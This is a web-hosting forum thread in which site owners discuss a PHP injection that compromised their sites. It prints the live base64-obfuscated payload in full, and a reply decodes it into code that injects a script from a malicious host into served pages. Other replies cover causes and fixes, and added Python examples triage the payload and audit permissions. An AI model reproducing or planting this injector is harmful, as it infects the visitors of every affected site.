  1. #1

    my site hacked by following php code

    Some hacker inserted the following code into my footer.php,
    and AVG told me about the threat. Thanks, AVG.
    Code:
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4O
DVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
    AVG told me the threat:
    http://www1.firesavez5.com/?p=p52dcW...iaiglnOdmps%3D

    I found that code and deleted it from my file. But I don't know how the hacker inserted it into my PHP file.

    Thanks,
    Lei
    Last edited by bear; 05-07-2010 at 09:55 AM.

  2. #2
    Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.

    Just for fun, here's that chunk decoded and cleaned up somewhat.

    Code:
    if(function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
    	$GLOBALS['mr_no']=1;
    
    	if(!function_exists('mrobh')) {
    		if(!function_exists('gml')) {
    		 function gml() {
    		  if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
    		   return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
    		  }
    
    		  return "";
    		 }
    		}
    
    		if(!function_exists('gzdecode')) {
    		 function gzdecode($var1) {
    		  $var3=@ord(@substr($var1,3,1));
    		  $var2=10;
    
    		  if($var3&4) {
    		   $var4=@unpack('v',substr($var1,10,2));
    		   $var4=$var4[1];
    		   $var2+=2+$var4;
    		  }
    
    		  if($var3&8) {
    		   $var2=@strpos($var1,chr(0),$var2)+1;
    		  }
    
    		  if($var3&16) {
    		   $var2=@strpos($var1,chr(0),$var2)+1;
    		  }
    
    		  if($var3&2) {
    		   $var2+=2;
    		  }
    
    		  $var5=@gzinflate(@substr($var1,$var2));
    
    		  if($var5===FALSE) {
    		   $var5=$var1;
    		  }
    
    		  return $var5;
    		 }
    		}
    
    		function mrobh($var6) {
    		 Header('Content-Encoding: none');
    		 $var7=gzdecode($var6);
    
    		 if(preg_match('/\<\/body/si',$var7)) {
    		  return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7);
    		 } else {
    		  return $var7.gml();
    		 }
    		}
    
    		ob_start('mrobh');
    	}
    }
    It's basically using an output buffer to capture the generated page, then injects an external script before the <body> tag.
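
Added example (not part of the original posts): a Python sketch that triages this kind of injection without executing it. It finds the `eval(base64_decode("..."))` wrapper, decodes nested base64 layers as text, lists the URLs inside and returns the file with the wrapper stripped. The sample file, the `get_footer_links()` call and the `injected.example` host are constructed for the example.

```python
import base64
import binascii
import re

# Wrapper shape from the thread: <?php /**/ eval(base64_decode("..."));?>
WRAPPER = re.compile(
    rb"<\?php\s*(?:/\*.*?\*/\s*)*eval\s*\(\s*base64_decode\s*\(\s*"
    rb"[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)\s*;?\s*\?>",
    re.S,
)
NESTED = re.compile(rb"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
URL = re.compile(rb"https?://[^\s\"'<>]+")


def decode_layers(blob, depth=3):
    """Decode a payload and any nested base64_decode("...") literals.
    Nothing is executed; every layer comes back as bytes for review."""
    try:
        text = base64.b64decode(blob)
    except binascii.Error:
        return []  # not valid base64, nothing to show
    layers = [text]
    if depth > 1:
        for inner in NESTED.findall(text):
            layers.extend(decode_layers(inner, depth - 1))
    return layers


def triage(source):
    """Return (source with the wrapper removed, URLs found in the payload)."""
    urls = []
    for match in WRAPPER.finditer(source):
        for layer in decode_layers(match.group(1)):
            urls.extend(u.decode("ascii", "replace") for u in URL.findall(layer))
    return WRAPPER.sub(b"", source), urls


def build_sample():
    """Constructed footer.php: thread-shaped wrapper, harmless payload."""
    inner = base64.b64encode(b'<script src="http://injected.example/ls.php"></script>')
    outer = b'function gml(){ return base64_decode("' + inner + b'"); }'
    wrapper = b'<?php /**/ eval(base64_decode("' + base64.b64encode(outer) + b'"));?>'
    return wrapper + b"<?php get_footer_links(); ?>\n"


if __name__ == "__main__":
    cleaned, urls = triage(build_sample())
    print("URLs in payload:", urls)
    print("Cleaned file:", cleaned.decode(), end="")
```

Run `triage()` over a copy of each PHP file and compare the cleaned output with a known-good backup before writing anything back.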

  3. #3
    Lei,

    Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.

    Garret

  4. #4
    I'm sure there are several approaches to getting this done. I'm no expert in this, but one of my "clients" had this problem, and each time he removed it, it was back the next day.
    It turned out that when I went over his folders and files and set the correct permissions the problem stopped. For more info have a look at http://en.wikipedia.org/wiki/Chmod

  5. #5
    chmod is only protecting files from being modified by whatever method is being used. It isn't actually plugging the security vulnerability that allowed it in the first place. Also, chmod won't help you if your script is vulnerable to injection by itself (and the permission the script is running under has write access), unless you set the files to read/execute only.

    Ideally, shared hosting environments should not allow users to modify other files on the server outside of their root path; if this is not the case, trouble your host to correct it. If they aren't locked out of other users' directories, it will be possible for them to do possibly more things than inject a snippet of code into a PHP script, including obtaining usernames and passwords to your database stored in plaintext configuration files.

  6. #6
    Thank you for clearing that up...

  7. #7
    The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.

  8. #8

  9. #9
    chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.

    It's a jungle out there.
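
Added example (not part of the original posts): a Python audit of the two permission problems raised in posts #4, #5 and #9, namely files or directories that other accounts can write to, and credentials files that other accounts can read. The sample tree is constructed, and the `secret_names` default is an assumption to replace with your application's config files.

```python
import os
import stat
import tempfile


def audit_permissions(docroot, secret_names=("wp-config.php", "config.php")):
    """Walk docroot and return sorted (relative_path, issue) findings.

    - writable by group or other: another account on a shared server
      could modify the file or drop files into the directory
    - credentials file readable by other: database passwords can be read
    secret_names is an assumption; list your application's config files."""
    findings = []
    for base, dirs, files in os.walk(docroot):
        for name in dirs + files:
            path = os.path.join(base, name)
            info = os.lstat(path)
            if stat.S_ISLNK(info.st_mode):
                continue  # a symlink's own mode says nothing about its target
            rel = os.path.relpath(path, docroot)
            if info.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((rel, "writable by group/other"))
            if name in secret_names and info.st_mode & stat.S_IROTH:
                findings.append((rel, "credentials readable by other"))
    return sorted(findings)


def build_sample_tree():
    """Constructed docroot: one safe file and two misconfigured ones."""
    root = tempfile.mkdtemp(prefix="docroot-")
    modes = {"index.php": 0o644, "footer.php": 0o666, "wp-config.php": 0o644}
    for name, mode in modes.items():
        path = os.path.join(root, name)
        with open(path, "w") as handle:
            handle.write("<?php // constructed sample\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for rel, issue in audit_permissions(build_sample_tree()):
        print(f"{rel}: {issue}")
```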

  10. #10
    Same thing happened to one of my clients: each file of his WordPress installation got that dump inside at the beginning. We found a PHP script that cleans up all files and also removes empty lines:
    tutorialsbay.com/wordpress-hacked-malware-redirect/

  11. #11
    Possibly a PHP Shell?

  12. #12
    I think this is weak security of file manager or picture manager plugins in WYSIWYG editors like TinyMCE.
    Here is our case in an old Mambo CMS installation:
    lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  13. #13
    Make sure you ask your host to update your cPanel and PHP/MYSQL. Make sure that you update your PHP scripts as well. A lot of hosts probably don't follow the proper procedures in security as well unfortunately from what I have seen. As always, backup your site every week at least.

  14. #14
    The people who create this code and hack it onto people's site are the most despicable of all internet criminals.

    I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.

    Their script finds every PHP file and prepends a chunk of PHP.

    So use that against them. Include in every page as you would functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.

    HTML Code:
    <?php
    
    # this file should be less than 570 chars in length
    
    $expected=570; 
    
    $data=file_get_contents(__FILE__);
    
    //echo strlen($data);
    
    if (strlen($data)>$expected)
    {
    	//mail('youremail','Website compromised '.$_SERVER['HTTP_HOST'],'taken offline','FROM: youremail');
    	if (!file_exists('index.phpx')) rename('index.php','index.phpx');
    	// write this despite the existence of index.phpx in case they strike again
    	$fh = fopen('index.php', 'w') or die("can't open file");
    	fwrite($fh, 'Sorry, we are currently offline');
    	fclose($fh);
    }
    
    
    ?>

  15. #15
    You can infect every page on a website with a PHP shell if they haven't secured PHP

  16. #16
    As long as it also infects this one; that's what I'm counting on.

  17. #17
    Quote (originally posted by mobic):
    It turned out that when I went over his folders and files and set the correct permissions the problem stopped.
    chmod is weak: one may put a PHP file to use the PHP chmod function, and it might also be changed by FTP.
    A better solution is to use "chattr +i", but you need shell access or... a PHP shell (if your hosting provider allows exec(), system(), etc.).

    Besides, who ever heard of chattr? No one? So haxorz wannabes don't know about it either.

  18. #18
    In response to OP:

    This usually occurs because a computer that had FTP/cPanel access to the account picked up some malware which took stored credentials either from Firefox, IT, etc... or from popular FTP software password storage files (such as Filezilla's unencrypted password store) and used that to insert the code.

    You should download MBAM (google it) and Avast/AVG/PrevX/etc and run them in full on any machine that has been compromised.

    Then (and only then), clean the account and reset the password to something new.

  19. #19
